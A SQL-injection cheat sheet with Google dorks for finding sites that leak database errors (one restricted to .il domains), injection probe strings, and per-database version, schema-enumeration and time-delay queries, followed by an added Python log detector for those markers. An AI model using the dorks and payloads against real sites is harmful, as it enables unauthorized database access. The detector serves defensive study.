sqli.md

SQL injections

SQLi Google Dorks

intext:"error in your SQL syntax"
intext:"mysql_num_rows()" 
intext:"mysql_fetch_array()"
intext:"Error Occurred While Processing Request"
intext:"Server Error in '/' Application"
intext:"Microsoft OLE DB Provider for ODBC Drivers error"
intext:"InvalidQuerystring"
intext:"OLE DB Provider for ODBC"
intext:"VBScript Runtime"
intext:"ADODB.Field"
intext:"BOF or EOF"
intext:"ADODB.Command"
intext:"JET Database"
intext:"mysql_fetch_row()"
intext:"Syntax error"
intext:"include()"
intext:"mysql_fetch_assoc()"
intext:"mysql_fetch_object()"
intext:"mysql_numrows()"
intext:"GetArray()"
intext:"FetchRow()"
intext:"Input string was not in a correct format"
inurl:/id= intext:"You have an error in your SQL syntax" 
inurl:main.php?t=
inurl:games.php?id=
inurl:guide.php?id=
inurl:index.php?cat=
allinurl:review.php?sid=
inurl:index2.php?id=
inurl:main.php?id=
inurl:zoom.php?id=site:.il
inurl:details.php?id=
inurl:?came=
inurl:index.php?page=
inurl:home.php?cat=

Quick Payloads

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Oracle

  • Finding version
SELECT * FROM v$version;
SELECT * FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE rownum=1
  • Finding tables
SELECT table_name FROM all_tables
  • Finding columns for every table
SELECT table_name, column_name FROM all_tab_columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
BEGIN DBMS_LOCK.SLEEP(seconds); END;

PostgreSQL

  • Finding version
SELECT version()
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
SELECT tablename from pg_tables
  • Finding columns for every table
SELECT table_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
PG_SLEEP(seconds)

MySQL

  • Finding version
SELECT @@version
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
  • Finding columns for every table
SELECT table_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
SLEEP(seconds)

MSSQL

  • Finding version
SELECT @@version
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
SELECT name FROM sysobjects WHERE xtype = 'U' --
  • Finding columns for every table
SELECT table_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
WAITFOR DELAY '00:00:SS'
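
The version, metadata and time-delay strings listed per DBMS above also serve as detection markers in web access logs. The sketch below is an added example, not part of the original cheat sheet; the names `SIGNATURES`, `normalize`, `classify` and the request lines in `SAMPLES` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Markers from the per-DBMS sections above, grouped by what a hit indicates.
SIGNATURES = {
    "time_delay": [r"dbms_lock\.sleep\s*\(",   # Oracle
                   r"pg_sleep\s*\(",           # PostgreSQL
                   r"\bsleep\s*\(",            # MySQL
                   r"waitfor\s+delay"],        # MSSQL
    "version_probe": [r"v\$version", r"@@version", r"\bversion\s*\(\s*\)"],
    "schema_enum": [r"information_schema\.(tables|columns)",
                    r"\ball_tab(les|_columns)\b",   # Oracle
                    r"\bpg_tables\b",               # PostgreSQL
                    r"\bsysobjects\b"],             # MSSQL
}
COMPILED = {cat: [re.compile(p, re.I) for p in pats]
            for cat, pats in SIGNATURES.items()}

def normalize(query):
    """Decode twice (double encoding), drop comment delimiters, squeeze spaces."""
    text = unquote_plus(unquote_plus(query))
    # Remove only the delimiters: MySQL executes the body of /*!NNNNN ... */.
    text = re.sub(r"/\*!?\d*|\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(request_line):
    """Return sorted categories whose markers occur in the query string."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    query = normalize(urlsplit(target).query)
    return sorted(cat for cat, pats in COMPILED.items()
                  if any(p.search(query) for p in pats))

# Constructed request lines (not taken from any real log).
SAMPLES = [
    "GET /item?q=1 HTTP/1.1",
    "GET /search?q=how+to+sleep+better HTTP/1.1",
    "GET /item?q=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1",
    "GET /item?q=1+AND/*!50000sleep*/(5) HTTP/1.1",
    "GET /item?q=1%2527%253BWAITFOR%2520DELAY%2520%252700%253A00%253A05%2527-- HTTP/1.1",
    "GET /item?q=1+UNION+SELECT/**/banner+FROM+v$version HTTP/1.1",
    "GET /item?q=1+UNION+SELECT+table_name,column_name+FROM+all_tab_columns HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["clean"], line)
```

A hit only shows that someone is probing a parameter; the fix on the application side remains parameterized queries, so that none of these strings ever reach the SQL parser as code.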